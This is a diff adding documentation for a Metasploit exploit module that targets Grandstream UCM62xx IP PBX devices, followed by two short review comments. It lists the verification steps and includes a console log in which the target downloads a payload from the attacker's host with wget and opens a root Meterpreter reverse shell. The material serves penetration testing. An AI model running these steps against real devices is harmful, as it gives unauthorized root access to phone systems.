documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md

```diff
@@ -0,0 +1,220 @@
+
+* https://firmware.grandstream.com/Release_UCM62xx_1.0.18.13.zip
+
+## Verification Steps
+
+* Acquire an affected device and configure with affected firmware
+* Do: `use exploit/linux/http/grandstream_ucm62xx_sendemail_rce`
+* Do: `set RHOST <ip>`
+* Do: `check`
+* Verify the remote target is flagged as vulnerable
+* Do: `set LHOST <ip>`
+* Do: `set LPORT <port>`
+* Do: `exploit`
+* You should get a Meterpreter session.
+
+## Targets
+
+### 0
+
+By default, this targets the PBX with the `reverse_netcat_gaping` payload and returns a reverse shell.
+
+### 1
+
+By default, this target obtains a meterpreter session using `wget`.
+
+## Options
+
+### TARGETURI
+
+Specifies base URI. The default value is `/`.
+
+## Scenarios
+
+### Grandstream UCM6202 IP PBX fimrware version 1.0.18.13. Get Meterpreter session.
+
+```
+msf6 > use exploit/linux/http/grandstream_ucm62xx_sendemail_rce
+[*] Using configured payload linux/armle/meterpreter/reverse_tcp
+msf6 exploit(linux/http/grandstream_ucm62xx_sendemail_rce) > set RHOST 10.0.0.9
+RHOST => 10.0.0.9
+msf6 exploit(linux/http/grandstream_ucm62xx_sendemail_rce) > check
+
+[*] Requesting version information from /cgi
+[*] The reported version is: 1.0.18.13
+[*] 10.0.0.9:8089 - The target appears to be vulnerable. This determination is based on the version string.
+msf6 exploit(linux/http/grandstream_ucm62xx_sendemail_rce) > set LHOST 10.0.0.3
+LHOST => 10.0.0.3
+msf6 exploit(linux/http/grandstream_ucm62xx_sendemail_rce) > run
+
+[*] Started reverse TCP handler on 10.0.0.3:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Requesting version information from /cgi
+[*] The reported version is: 1.0.18.13
+[+] The target appears to be vulnerable. This determination is based on the version string.
+[*] Executing Linux Dropper for linux/armle/meterpreter/reverse_tcp
+[*] Using URL: http://0.0.0.0:8080/unV0mXd6RPWD
+[*] Local IP: http://10.0.0.3:8080/unV0mXd6RPWD
+[*] Client 10.0.0.9 (Wget/1.10.1) requested /unV0mXd6RPWD
+[*] Sending payload to 10.0.0.9 (Wget/1.10.1)
+[*] Sending stage (903400 bytes) to 10.0.0.9
+[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.9:51031 ) at 2022-01-15 12:12:28 -0800
+[+] Exploit successfully executed.
+[*] Command Stager progress - 100.00% done (113/113 bytes)
+[*] Server stopped.
+
+meterpreter > shell
+Process 4990 created.
+Channel 1 created.
+whoami
+root
+uname -a
+Linux UCM6202 3.0.35 #1 SMP PREEMPT Thu Jul 5 15:56:51 CST 2018 armv7l GNU/Linux
+cat /proc/cpuinfo
+Processor	: ARMv7 Processor rev 10 (v7l)
+processor	: 0
+BogoMIPS	: 1988.29
+
+processor	: 1
+BogoMIPS	: 1987.37
+
+Features	: swp half thumb fastmult vfp edsp neon vfpv3 
+CPU implementer	: 0x41
+CPU architecture: 7
+CPU variant	: 0x2
+CPU part	: 0xc09
+CPU revision	: 10
+
+Hardware	: Freescale i.MX 6Quad/DualLite/Solo based Board
+Revision	: 63015
+Serial		: 1126b9d4eacb275c
+```
+
+### Grandstream UCM6202 IP PBX fimrware version 1.0.18.13. Get reverse shell using netcat.
```

Comment:
This is missing the firmware versions.

Reply:
Anyone reading this: I requested @smcintyre-r7 leave a comment that I misspelled "firmware". The version is included.